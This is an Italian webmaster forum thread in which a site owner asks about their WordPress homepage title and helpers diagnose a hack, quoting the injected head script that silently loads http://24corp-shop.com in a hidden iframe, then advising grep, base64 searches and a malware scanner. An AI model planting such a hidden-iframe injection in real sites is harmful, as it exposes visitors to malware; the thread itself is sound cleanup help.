- Home
- Categorie
- Digital Marketing
- SEO
- Titolo nei risultati di ricerca
-
Il suo sito viene bloccato da Chrome in quanto contenente malware sul dominio 24corp-shop.com, controlli cosa sta succedendo.
Per poi rispondere alla sua domanda, il titolo della sua homepage è semplicemente "Home", lo cambi in un title un po' più descrittivo e.g. "Suite Beach Bed & Breakfast" o qualcosa del genere, vedrà che apparirà quello nei risultati. Comunque i problemi del suo sito son ben più gravi di un semplice title, visto il problema dei malware
-
Grazie Broc, non riesco ad eliminare il malware sul mio dominio, non riesco a capire dove si annida questo codice.
Dove vede il titolo della mia Home Page? Io avevo fatto una modifica nel file header ma a quanto pare non va bene?
Dove vado a modificarlo?
-
Nell'head del suo sito c'è questo script, non so a cosa serva ma lo rimuova subito.
<script language="JavaScript"> if(document.loaded) { showBrowVer(); } else { if (window.addEventListener) { window.addEventListener('load', showBrowVer, false); } else { window.attachEvent('onload', showBrowVer); } } function showBrowVer() { var divTag=document.createElement('div'); divTag.id='dt'; document.body.appendChild(divTag); var js_kod2 = document.createElement('iframe'); js_kod2.src = 'http://24corp-shop.com'; js_kod2.width = '250px'; js_kod2.height = '320px'; js_kod2.setAttribute('style','visibility:hidden'); document.getElementById('dt').appendChild(js_kod2); }</script>
Il title della pagina si cambia nello stesso posto. Se usa Wordpress potrà cambiare il title nelle impostazioni e rimuovere il codice operando su header.php.
P.S.: a meno che non abbia lei volutamente inserito il codice, il suo sito è stato violato. Aggiorni WP all'ultima versione e usi qualche accorgimento di sicurezza.
-
Si esatto, il mio sito è stato violato, Il punto è che non so da dove andarlo a rimuovere, nell'header.php non c'e' lo script.
Ed in questo momento non posso aggiornare wordpress perchè il tema non lo supporterebbe.
-
La cosa più straightforward è connettersi al suo hosting tramite console ssh e fare un grep fra tutti i file per trovare dove si trova quel codice.
Tipo > grep -rl "24corp-shop.com"
-
Sai dirmi come si fa?
-
Te l'ho detto
dipende dal tuo hosting, non tutti danno accesso alla console ssh, in tal caso dovrai scaricarti il sito e usando un editor di testo automatizzato (se sei su windows usa Notepad++) cercare dove si trova lo script.
Se vuoi fare piu' "manualmente" guardati tutti i php di Wordpress e prima o poi lo troverai
-
Grazie mille, sei stato gentilissimo
-
Ho scansionato tutti i file del sito, compreso installazione di wordpress, non c'e' traccia di quel codice.
Potrebbe essere annidato nelle tabelle del database?
-
Se cosi' fosse, dovrebbe esserci un 'eval' da qualche parte nel codice PHP.
Piu' probabile pero' che il codice sia criptato in base64. Farei una ricerca di "base64" su tutti i file per vedere se da qualche parte viene decodificato
A questo punto e' necessaria un'analisi approfondita:
- BACKUP!
- installa https://wordpress.org/plugins/gotmls/ e fallo girare
- controlla functions.php del tema, da che ne so spesso si annidano li'
- disabilita tutti i plugin e cambia tema
Spero sia sufficiente fermarsi al punto 2
Facci sapere come va!